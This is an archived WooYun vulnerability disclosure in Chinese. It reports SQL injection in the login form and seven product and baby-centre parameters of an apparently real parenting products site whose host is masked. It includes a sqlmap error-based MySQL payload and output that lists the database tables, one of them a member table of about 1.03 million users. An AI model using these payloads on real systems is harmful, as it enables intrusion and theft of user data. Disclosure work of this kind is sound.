乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-19: 细节已通知厂商并且等待厂商处理中 2015-12-23: 厂商已经确认,细节仅向厂商公开 2016-01-02: 细节向核心白帽子及相关领域专家公开 2016-01-12: 细节向普通白帽子公开 2016-01-22: 细节向实习白帽子公开 2016-02-06: 细节向公众公开
——!——会员登录处存在注入!~~~
这个会不会被提交了呢?注入点:
http://**.**.**.**/about/express.php?year=-1 (GET)http://**.**.**.**/login.php (POST)txtLoginName=1&txtLoginPwd=2&goClcik=
txtLoginPwd存在注入
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: txtLoginPwd Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: txtLoginName=1&txtLoginPwd=2' AND (SELECT 3570 FROM(SELECT COUNT(*),CONCAT(0x7176716e71,(SELECT (CASE WHEN (3570=3570) THEN 1 ELSE 0 END)),0x7178716971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eNiX'='eNiX&goClcik=---[13:55:40] [INFO] testing MySQL[13:55:40] [INFO] confirming MySQL[13:55:41] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2, PHP 5.5.19back-end DBMS: MySQL >= 5.0.0[13:55:41] [INFO] fetching current user[13:55:41] [INFO] resumed: wwwscient_scient@localhostcurrent user: 'wwwscient_scient@localhost'[13:55:41] [INFO] fetching current database[13:55:41] [INFO] resumed: wwwscient_scientcurrent database: 'wwwscient_scient'[13:55:41] [INFO] testing if current user is DBA[13:55:41] [INFO] fetching current usercurrent user is DBA: Falseavailable databases [2]:[*] information_schema[*] wwwscient_scientDatabase: wwwscient_scient+------------------+---------+| Table | Entries |+------------------+---------+| member2013 | 1033281 || mononlining | 9395 || dzhufu | 549 || tn_sys_lang | 427 || news | 290 || babylife | 192 || dnews | 154 || db_photo | 59 || products_quality | 51 || paperinfo | 41 || menu | 36 || dchina | 32 || products | 32 || babyedu | 31 || aboutus | 28 || assessment | 28 || paperban | 27 || babylifetype | 26 || db_prov | 23 || mononline | 23 || mominfo | 22 || tn_news | 20 || abouttype | 15 || tn_sys_pic | 14 || tn_sys_plus | 10 || manageuser | 9 || roles | 9 || momspeak | 8 || paperyeas | 8 || dclass | 7 || usereport | 7 || mononlinetype | 6 || producttype | 6 || tn_sys_var | 6 || productage | 5 || activities | 4 || babyedutype | 4 || mominfotype | 3 || tn_award | 3 || tn_user | 2 || db_admin | 1 || newstype | 1 || tn_serialnum | 1 || tn_sys_admin | 1 |+------------------+---------+
103万用户
注入点一:
http://**.**.**.**/product/product.php?id=4&ProductTypeID=4
这里的id存在注入
注入点二:
http://**.**.**.**/product/product-index.php?ProductTypeID=4
这个下面的ProductTypeID存在注入
注入点三:
http://**.**.**.**/product/product-index.php?ProductAgeID=1
ProductAgeID存在注入
注入点四:
http://**.**.**.**/baby-center/baby-edu.php?BabyEduTypeID=1
BabyEduTypeID存在注入
注入点五:
http://**.**.**.**/baby-center/baby-edu.php?ID=1&BabyEduTypeID=1
ID和BabyEduTypeID均存在注入
注入点六:
http://**.**.**.**/baby-center/baby-life.php?ID=1&&type=0
ID存在注入
注入点七:
http://**.**.**.**/baby-center/assessment.php?sexName=男&&sexValue=1&&Month=5
Month存在注入
available databases [2]:[*] information_schema[*] wwwscient_scientDatabase: wwwscient_scient+------------------+---------+| Table | Entries |+------------------+---------+| member2013 | 1033281 || mononlining | 9395 || dzhufu | 549 || tn_sys_lang | 427 || news | 290 || babylife | 192 || dnews | 154 || db_photo | 59 || products_quality | 51 || paperinfo | 41 || menu | 36 || dchina | 32 || products | 32 || babyedu | 31 || aboutus | 28 || assessment | 28 || paperban | 27 || babylifetype | 26 || db_prov | 23 || mononline | 23 || mominfo | 22 || tn_news | 20 || abouttype | 15 || tn_sys_pic | 14 || tn_sys_plus | 10 || manageuser | 9 || roles | 9 || momspeak | 8 || paperyeas | 8 || dclass | 7 || usereport | 7 || mononlinetype | 6 || producttype | 6 || tn_sys_var | 6 || productage | 5 || activities | 4 || babyedutype | 4 || mominfotype | 3 || tn_award | 3 || tn_user | 2 || db_admin | 1 || newstype | 1 || tn_serialnum | 1 || tn_sys_admin | 1 |+------------------+---------+
103万用户不多说了,你们懂的!~~~
过滤修复
危害等级:中
漏洞Rank:10
确认时间:2015-12-23 20:07
CNVD未直接复现所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。
暂无